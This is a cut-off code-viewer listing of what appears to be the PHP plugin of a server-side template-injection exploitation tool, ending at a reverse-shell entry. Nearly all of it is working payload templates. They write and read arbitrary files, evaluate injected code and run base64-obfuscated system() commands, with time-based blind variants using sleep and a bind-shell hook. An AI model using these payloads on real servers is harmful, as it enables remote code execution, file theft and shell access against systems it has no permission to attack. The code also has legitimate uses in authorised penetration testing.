(self)
| 12 | |
| 13 | |
| 14 | def language_init(self): |
| 15 | |
| 16 | self.update_actions({ |
| 17 | 'render' : { |
| 18 | 'call': 'inject', |
| 19 | 'render': """%(code)s""", |
| 20 | 'header': """print_r('%(header)s');""", |
| 21 | 'trailer': """print_r('%(trailer)s');""", |
| 22 | 'test_render': 'print(%(r1)s);' % { |
| 23 | 'r1' : rand.randints[0] |
| 24 | }, |
| 25 | 'test_render_expected': '%(r1)s' % { |
| 26 | 'r1' : rand.randints[0] |
| 27 | } |
| 28 | }, |
| 29 | 'write' : { |
| 30 | 'call' : 'evaluate', |
| 31 | 'write' : """$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""", |
| 32 | 'truncate' : """file_put_contents("%(path)s", "");""" |
| 33 | }, |
| 34 | 'read' : { |
| 35 | 'call': 'evaluate', |
| 36 | 'read' : """print(base64_encode(file_get_contents("%(path)s")));""" |
| 37 | }, |
| 38 | 'md5' : { |
| 39 | 'call': 'evaluate', |
| 40 | 'md5': """is_file("%(path)s") && print(md5_file("%(path)s"));""" |
| 41 | }, |
| 42 | 'evaluate' : { |
| 43 | 'call': 'render', |
| 44 | 'evaluate': """%(code)s""", |
| 45 | 'test_os' : 'echo PHP_OS;', |
| 46 | 'test_os_expected': '^[\w-]+$' |
| 47 | }, |
| 48 | 'execute' : { |
| 49 | 'call': 'evaluate', |
| 50 | 'execute': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""", |
| 51 | 'test_cmd': bash.echo % { 's1': rand.randstrings[2] }, |
| 52 | 'test_cmd_expected': rand.randstrings[2] |
| 53 | }, |
| 54 | 'blind' : { |
| 55 | 'call': 'evaluate_blind', |
| 56 | 'test_bool_true' : """True""", |
| 57 | 'test_bool_false' : """False""" |
| 58 | }, |
| 59 | 'evaluate_blind' : { |
| 60 | 'call': 'inject', |
| 61 | 'evaluate_blind': """$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");""" |
| 62 | }, |
| 63 | 'execute_blind' : { |
| 64 | 'call': 'inject', |
| 65 | 'execute_blind': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");""" |
| 66 | }, |
| 67 | 'bind_shell' : { |
| 68 | 'call' : 'execute_blind', |
| 69 | 'bind_shell': bash.bind_shell |
| 70 | }, |
| 71 | 'reverse_shell' : { |
nothing calls this directly
no test coverage detected